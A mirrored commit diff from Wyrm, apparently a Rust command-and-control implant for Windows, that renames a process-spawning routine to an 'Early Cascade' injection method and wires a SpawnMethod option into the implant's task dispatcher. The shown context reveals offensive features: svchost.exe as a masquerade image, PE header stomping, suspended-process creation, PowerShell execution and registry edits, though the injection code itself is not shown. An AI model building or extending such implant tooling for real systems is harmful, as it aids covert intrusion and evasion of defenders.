mirror of
https://github.com/0xflux/Wyrm
synced 2026-06-08 10:13:19 +00:00
Be consistent with naming conventions
This commit is contained in:
@@ -25,12 +25,12 @@ use windows_sys::Win32::{
|
||||
},
|
||||
};
|
||||
|
||||
use crate::{dbgprint, utils::pe_stomp::stomp_pe_header_bytes};
|
||||
use crate::utils::pe_stomp::stomp_pe_header_bytes;
|
||||
|
||||
// TODO move to profile &/ default?
|
||||
const SPAWN_AS_IMAGE: &'static [u8; 32] = b"C:\\Windows\\System32\\svchost.exe\0";
|
||||
|
||||
pub(super) fn spawn_sibling(mut buf: Vec<u8>) -> WyrmResult<String> {
|
||||
pub(super) fn early_cascade_spawn_child(mut buf: Vec<u8>) -> WyrmResult<String> {
|
||||
//
|
||||
// Create the process in a suspended state, using the image specified by either the user (TODO) or
|
||||
// svchost as the default image.
|
||||
@@ -1,6 +1,5 @@
|
||||
use std::{
|
||||
fs::{self, File},
|
||||
io::Read,
|
||||
fs::{self},
|
||||
path::PathBuf,
|
||||
};
|
||||
|
||||
@@ -8,15 +7,23 @@ use shared::tasks::WyrmResult;
|
||||
|
||||
use crate::{
|
||||
native::filesystem::{PathParseType, parse_path},
|
||||
spawn::hollow_apc::spawn_sibling,
|
||||
spawn::early_cascade::early_cascade_spawn_child,
|
||||
};
|
||||
|
||||
pub mod hollow_apc;
|
||||
pub mod early_cascade;
|
||||
|
||||
pub enum SpawnMethod {
|
||||
EarlyCascade,
|
||||
}
|
||||
|
||||
pub struct Spawn;
|
||||
|
||||
impl Spawn {
|
||||
pub fn spawn_sibling(path: &str, implant_working_dir: &PathBuf) -> WyrmResult<String> {
|
||||
pub fn spawn_child(
|
||||
path: &str,
|
||||
implant_working_dir: &PathBuf,
|
||||
method: SpawnMethod,
|
||||
) -> WyrmResult<String> {
|
||||
let path = match parse_path(path, implant_working_dir, PathParseType::File) {
|
||||
WyrmResult::Ok(p) => p,
|
||||
WyrmResult::Err(e) => {
|
||||
@@ -30,6 +37,9 @@ impl Spawn {
|
||||
let Ok(buf) = fs::read(path) else {
|
||||
return WyrmResult::Err(format!("Could not read file"));
|
||||
};
|
||||
spawn_sibling(buf)
|
||||
|
||||
match method {
|
||||
SpawnMethod::EarlyCascade => early_cascade_spawn_child(buf),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
+6
-2
@@ -48,7 +48,7 @@ use crate::{
|
||||
registry::{reg_add, reg_del, reg_query},
|
||||
shell::run_powershell,
|
||||
},
|
||||
spawn::Spawn,
|
||||
spawn::{Spawn, SpawnMethod},
|
||||
utils::{
|
||||
comptime::translate_build_artifacts, proxy::resolve_web_proxy,
|
||||
strings::generate_mutex_name, svc_controls::stop_svc_and_exit, time_utils::epoch_now,
|
||||
@@ -333,7 +333,11 @@ impl Wyrm {
|
||||
}
|
||||
Command::Spawn => {
|
||||
let path = task.metadata.unwrap();
|
||||
Spawn::spawn_sibling(&path, &self.current_working_directory);
|
||||
Spawn::spawn_child(
|
||||
&path,
|
||||
&self.current_working_directory,
|
||||
SpawnMethod::EarlyCascade,
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user